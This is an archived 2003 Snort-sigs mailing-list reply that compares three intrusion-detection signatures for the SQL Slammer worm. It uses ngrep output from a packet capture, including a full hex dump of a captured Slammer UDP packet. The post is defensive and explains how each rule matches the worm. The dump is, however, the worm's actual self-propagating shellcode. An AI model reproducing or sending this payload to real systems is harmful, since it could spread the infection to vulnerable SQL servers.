[Snort-sigs] SQL Slammer Worm Signature

John Sage jsage at ...425...
Mon Feb 10 11:06:04 EST 2003


Michael:

On Mon, Feb 10, 2003 at 05:19:38PM +0800, Michael.Advani at ...1221... wrote:
> Someone formerly posted the rule for capturing SQL slammer as:
> 
> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm 
> Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown; 
> sid:9998; rev:1;)
> 
> which differs from the one found in snort.org (snortrules-current.tar.gz):
> 
> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
> attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
> content:"sock"; content:"send"; reference:bugtraq,5310;
> classtype:misc-attack; reference:bugtraq,5311;
> reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)
> 
> Others suggest this rule:
> 
> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
> Activity"; content:
> "dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)
> 
> How come there are so many versions ? Though the header part is identical,
> the 'meat' is totally different !

They're simply three different ways of looking at the same thing:

> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm 
> Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown; 
> sid:9998; rev:1;)

A hex search of packet content:

[toot at ...1275... /storage/snort/old_snorts/013003]# ngrep -eXt -I
snort-0130\@1918.log "0x0401010101010101" "dst port 1434"
input: snort-0130 at ...1276...
filter: ip and ( dst port 1434 )
match: 0x0401010101010101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
  .....................................................................................
  ...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32hkernQhou
  nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt
  .....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<a...E... at ...1226...)
  .......E.j..E.P1.Qf..x.Q.E.P.E.P....                                                 
#
<snip>
exit



> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
> attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
> content:"sock"; content:"send"; reference:bugtraq,5310;
> classtype:misc-attack; reference:bugtraq,5311;
> reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)

Another hex search:

[toot at ...1275... /storage/snort/old_snorts/013003]# ngrep -eXt -I
snort-0130\@1918.log "0x81F10301049B81F101" "dst port 1434"
input: snort-0130 at ...1276...
filter: ip and ( dst port 1434 )
match: 0x81F10301049B81F101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
  .....................................................................................
  ...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32hkernQhou
  nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt
  .....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<a...E... at ...1226...)
  .......E.j..E.P1.Qf..x.Q.E.P.E.P....                                                 
#
<snip>
exit



> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
> Activity"; content:
> "dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)

Note that this queries for ASCII content, not hex..

[root at ...1275... /storage/snort/old_snorts/013003]# ngrep -ext -I
snort-0130\@1918.log "dllhel32hkernQhounthickChGetTf" "dst port 1434"
input: snort-0130 at ...1276...
filter: ip and ( dst port 1434 )
match: dllhel32hkernQhounthickChGetTf
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
  04 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 dc c9 b0 42 eb 0e 01    01 01 01 01 01 01 70 ae    ....B.........p.
  42 01 70 ae 42 90 90 90    90 90 90 90 90 68 dc c9    B.p.B........h..
  b0 42 b8 01 01 01 01 31    c9 b1 18 50 e2 fd 35 01    .B.....1...P..5.
  01 01 05 50 89 e5 51 68    2e 64 6c 6c 68 65 6c 33    ...P..Qh.dllhel3
  32 68 6b 65 72 6e 51 68    6f 75 6e 74 68 69 63 6b    2hkernQhounthick
  43 68 47 65 74 54 66 b9    6c 6c 51 68 33 32 2e 64    ChGetTf.llQh32.d
  68 77 73 32 5f 66 b9 65    74 51 68 73 6f 63 6b 66    hws2_f.etQhsockf
  b9 74 6f 51 68 73 65 6e    64 be 18 10 ae 42 8d 45    .toQhsend....B.E
  d4 50 ff 16 50 8d 45 e0    50 8d 45 f0 50 ff 16 50    .P..P.E.P.E.P..P
  be 10 10 ae 42 8b 1e 8b    03 3d 55 8b ec 51 74 05    ....B....=U..Qt.
  be 1c 10 ae 42 ff 16 ff    d0 31 c9 51 51 50 81 f1    ....B....1.QQP..
  03 01 04 9b 81 f1 01 01    01 01 51 8d 45 cc 50 8b    ..........Q.E.P.
  45 c0 50 ff 16 6a 11 6a    02 6a 02 ff d0 50 8d 45    E.P..j.j.j...P.E
  c4 50 8b 45 c0 50 ff 16    89 c6 09 db 81 f3 3c 61    .P.E.P........<a
  d9 ff 8b 45 b4 8d 0c 40    8d 14 88 c1 e2 04 01 c2    ...E... at ...1016...
  c1 e2 08 29 c2 8d 04 90    01 d8 89 45 b4 6a 10 8d    ...).......E.j..
  45 b0 50 31 c9 51 66 81    f1 78 01 51 8d 45 03 50    E.P1.Qf..x.Q.E.P
  8b 45 ac 50 ff d6 eb ca                               .E.P....        
#
<snip>


- John
-- 
"You are in a little maze of twisty passages, all different."

    PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705




More information about the Snort-sigs mailing list